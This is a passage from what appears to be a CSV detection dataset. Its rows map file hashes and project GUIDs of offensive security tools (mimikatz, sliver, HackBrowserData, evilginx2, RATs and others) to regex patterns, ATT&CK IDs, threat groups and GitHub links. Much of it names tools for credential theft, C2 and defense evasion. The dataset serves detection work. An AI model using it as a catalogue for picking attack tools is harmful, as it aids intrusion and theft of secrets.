SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31958" "*9dc2d1ac93b43a6f3450e6d99201dfa4b7e75e8872d97b6cc90e455201ff0c83*",".{0,1000}9dc2d1ac93b43a6f3450e6d99201dfa4b7e75e8872d97b6cc90e455201ff0c83.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","31959" "*9dc8078d3dbaf1fb1ca922f81df33cc871fef0a2dbe271a6756f9fcc0b6186b7*",".{0,1000}9dc8078d3dbaf1fb1ca922f81df33cc871fef0a2dbe271a6756f9fcc0b6186b7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31961" 
"*9dcfe69a9101e0c92a91f12ff03e7a3f1a19a6697c88920b7fcb76dd581a14fa*",".{0,1000}9dcfe69a9101e0c92a91f12ff03e7a3f1a19a6697c88920b7fcb76dd581a14fa.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31962" "*9ddb20f6175ae6a093b49528dee1db17ad5363de30ff316a04dbe44708597aaa*",".{0,1000}9ddb20f6175ae6a093b49528dee1db17ad5363de30ff316a04dbe44708597aaa.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31964" "*9de97ca3add57fbe16c2752b22478d49eacdd3d8f1c032bb43792a83ca92e5ca*",".{0,1000}9de97ca3add57fbe16c2752b22478d49eacdd3d8f1c032bb43792a83ca92e5ca.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31965" "*9dede3f64f01a53799636a50ff9f342ea1e2467771de9eccc3a1cd36e33db476*",".{0,1000}9dede3f64f01a53799636a50ff9f342ea1e2467771de9eccc3a1cd36e33db476.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31967" "*9df8ad1870faa8759951937913cbbc3d698b2bca0494ac1f2f578e76bc72ded5*",".{0,1000}9df8ad1870faa8759951937913cbbc3d698b2bca0494ac1f2f578e76bc72ded5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31968" "*9e0f93ef74347d1d494678f3eed8af14ac53fcf3e28349fc277f552e0fa6d984*",".{0,1000}9e0f93ef74347d1d494678f3eed8af14ac53fcf3e28349fc277f552e0fa6d984.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31972" "*9e1682246913526e808e837cdb9ffcd209ba4fe43be79c9505c2a98dfef3fb95*",".{0,1000}9e1682246913526e808e837cdb9ffcd209ba4fe43be79c9505c2a98dfef3fb95.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","31974" "*9e1a4c27fa18f0126da8e2ea83f8c750e83d529c9fd6897327923c96ac6b3b89*",".{0,1000}9e1a4c27fa18f0126da8e2ea83f8c750e83d529c9fd6897327923c96ac6b3b89.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31975" "*9e1d32bf24ad4bd2def2368e1442237e0a1cc552b7b1fab4ca491b929141dd13*",".{0,1000}9e1d32bf24ad4bd2def2368e1442237e0a1cc552b7b1fab4ca491b929141dd13.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31977" "*9e2e7dd4185ca2abe91139c009790c2a8991e8c652ef8b0d80989a4070c764f0*",".{0,1000}9e2e7dd4185ca2abe91139c009790c2a8991e8c652ef8b0d80989a4070c764f0.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","#filehash","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","31979" "*9E357027-8AA6-4376-8146-F5AF610E14BB*",".{0,1000}9E357027\-8AA6\-4376\-8146\-F5AF610E14BB.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","0","#GUIDproject","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","31981" "*9E36AE6E-B9FD-4B9B-99BA-42D3EACD7506*",".{0,1000}9E36AE6E\-B9FD\-4B9B\-99BA\-42D3EACD7506.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31983" "*9e373722530a78ab12472a38e0b6834a31162c25eeac4f02ce9cdb755e1effb0*",".{0,1000}9e373722530a78ab12472a38e0b6834a31162c25eeac4f02ce9cdb755e1effb0.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31984" "*9e3a20cef67c034ac59b4793a8aa34cbdc7e130fe0ae791fe74059ba4ba0983d*",".{0,1000}9e3a20cef67c034ac59b4793a8aa34cbdc7e130fe0ae791fe74059ba4ba0983d.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","31985" "*9e3c27168bdaa45fe127ba530d5f5bfbec067088fe92d02b78342a0e66dba5c0*",".{0,1000}9e3c27168bdaa45fe127ba530d5f5bfbec067088fe92d02b78342a0e66dba5c0.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","31988" "*9e415352dda775398d02d9dd203367ce365c562da6227f72b77fb2916550345f*",".{0,1000}9e415352dda775398d02d9dd203367ce365c562da6227f72b77fb2916550345f.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","31989" "*9e485ad4912ef50847e09de786a67ecbfddc97f0bd6b731ff15f9c03975114c9*",".{0,1000}9e485ad4912ef50847e09de786a67ecbfddc97f0bd6b731ff15f9c03975114c9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework 
that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31990" "*9e49c482faf12eaefc62f5724c083e35de138b15d2c593db2398577ebd6fdf33*",".{0,1000}9e49c482faf12eaefc62f5724c083e35de138b15d2c593db2398577ebd6fdf33.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31991" "*9e49c482faf12eaefc62f5724c083e35de138b15d2c593db2398577ebd6fdf33*",".{0,1000}9e49c482faf12eaefc62f5724c083e35de138b15d2c593db2398577ebd6fdf33.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - 
T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31992" "*9e53f4d6daccf2c7f5f8acbe56160e6f7301f3bdd05e067cb2be6c7f17e0c482*",".{0,1000}9e53f4d6daccf2c7f5f8acbe56160e6f7301f3bdd05e067cb2be6c7f17e0c482.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","31995" "*9E5A6F99-0A26-4959-847D-A4221CF4441B*",".{0,1000}9E5A6F99\-0A26\-4959\-847D\-A4221CF4441B.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","31997" "*9e5f035ccefdbc02663184279025d1d84e2823a0340f6e027b55670987f0a42c*",".{0,1000}9e5f035ccefdbc02663184279025d1d84e2823a0340f6e027b55670987f0a42c.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","31998" "*9e6659ea06490dde8a0815c3df51dfa242e6f9f0dd8f5a3ba3e7e4cdc2e77630*",".{0,1000}9e6659ea06490dde8a0815c3df51dfa242e6f9f0dd8f5a3ba3e7e4cdc2e77630.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","31999" "*9e67ec011613b7a41c197b89e1affac2f3d421a91e89e64f0f4ba195dfffb3db*",".{0,1000}9e67ec011613b7a41c197b89e1affac2f3d421a91e89e64f0f4ba195dfffb3db.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32001" "*9e6d326e015aaf3634835f5f7da3579ff477c5b93ea43d349b819925e83a7537*",".{0,1000}9e6d326e015aaf3634835f5f7da3579ff477c5b93ea43d349b819925e83a7537.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32003" "*9E6E4B36B39C50C733FE8EB2DD43AB1A6B397066866A1D16987D87275B0359D3*",".{0,1000}9E6E4B36B39C50C733FE8EB2DD43AB1A6B397066866A1D16987D87275B0359D3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","32004" "*9e83b2e2efe2a751a735f413dee7582e8ba8a0639b8d092cf165b87b166639c2*",".{0,1000}9e83b2e2efe2a751a735f413dee7582e8ba8a0639b8d092cf165b87b166639c2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","32007" "*9e85c971331b8ad686c8d79ea81c4883d3f36a7de2071551fe5369fcf34ea3d0*",".{0,1000}9e85c971331b8ad686c8d79ea81c4883d3f36a7de2071551fe5369fcf34ea3d0.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb 
w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","32008" "*9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04*",".{0,1000}9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32009" "*9e9aaf77f76851a8d1da734637ed245260ad503de82fa4c886a070e29fdd3ee3*",".{0,1000}9e9aaf77f76851a8d1da734637ed245260ad503de82fa4c886a070e29fdd3ee3.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","32011" "*9E9BB94C-1FBE-4D0B-83B7-E42C83FC5D45*",".{0,1000}9E9BB94C\-1FBE\-4D0B\-83B7\-E42C83FC5D45.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#GUIDproject","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","32012" "*9ea5eacc218210713b56a5b131e254114322f3cadb41fb074cfe02d07f5e8e03*",".{0,1000}9ea5eacc218210713b56a5b131e254114322f3cadb41fb074cfe02d07f5e8e03.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32013" "*9ea66594805d5e7b8a1abc876f99d7ce1de87936902a3f7726f5f0188778c874*",".{0,1000}9ea66594805d5e7b8a1abc876f99d7ce1de87936902a3f7726f5f0188778c874.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","32014" 
"*9ea746441ab9d38f81e10c8688f8420a15127684c68cdf82ab87cf1e98cca47e*",".{0,1000}9ea746441ab9d38f81e10c8688f8420a15127684c68cdf82ab87cf1e98cca47e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32015" "*9ea9995496c329267d7bfba8f2061b6df43d5db255bc103b14730042e782e5cf*",".{0,1000}9ea9995496c329267d7bfba8f2061b6df43d5db255bc103b14730042e782e5cf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32016" "*9eafa0b3e8005c6b03cb5d2522140021c573b5efd042fcc057a4ff75794c28ea*",".{0,1000}9eafa0b3e8005c6b03cb5d2522140021c573b5efd042fcc057a4ff75794c28ea.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32017" "*9eb0701865866d14eb8a85cb2801de1963400fac29467be8e4c253212955d06d*",".{0,1000}9eb0701865866d14eb8a85cb2801de1963400fac29467be8e4c253212955d06d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32018" "*9eb21ba1323fac7c64c1e03fb3c29e374ab7d99ab9c4d27eb4c3166575769a0f*",".{0,1000}9eb21ba1323fac7c64c1e03fb3c29e374ab7d99ab9c4d27eb4c3166575769a0f.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","32019" "*9eb720213fd4b7e283384dd03306b7a4a632234ff743f9812169d0e22efb24ed*",".{0,1000}9eb720213fd4b7e283384dd03306b7a4a632234ff743f9812169d0e22efb24ed.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","32021" "*9eb78bef9bba6135087de0c8307c2f893eef9a4a2d1f8c37de643f059ce2f711*",".{0,1000}9eb78bef9bba6135087de0c8307c2f893eef9a4a2d1f8c37de643f059ce2f711.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android 
Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","32022" "*9EB8DC3B-60DC-451E-8C18-3D7E38D463FD*",".{0,1000}9EB8DC3B\-60DC\-451E\-8C18\-3D7E38D463FD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32023" "*9ebd06f50a0d1e1cd7b6d00a2bda96120af6284799a1400894e4898a9a59e13f*",".{0,1000}9ebd06f50a0d1e1cd7b6d00a2bda96120af6284799a1400894e4898a9a59e13f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32024" 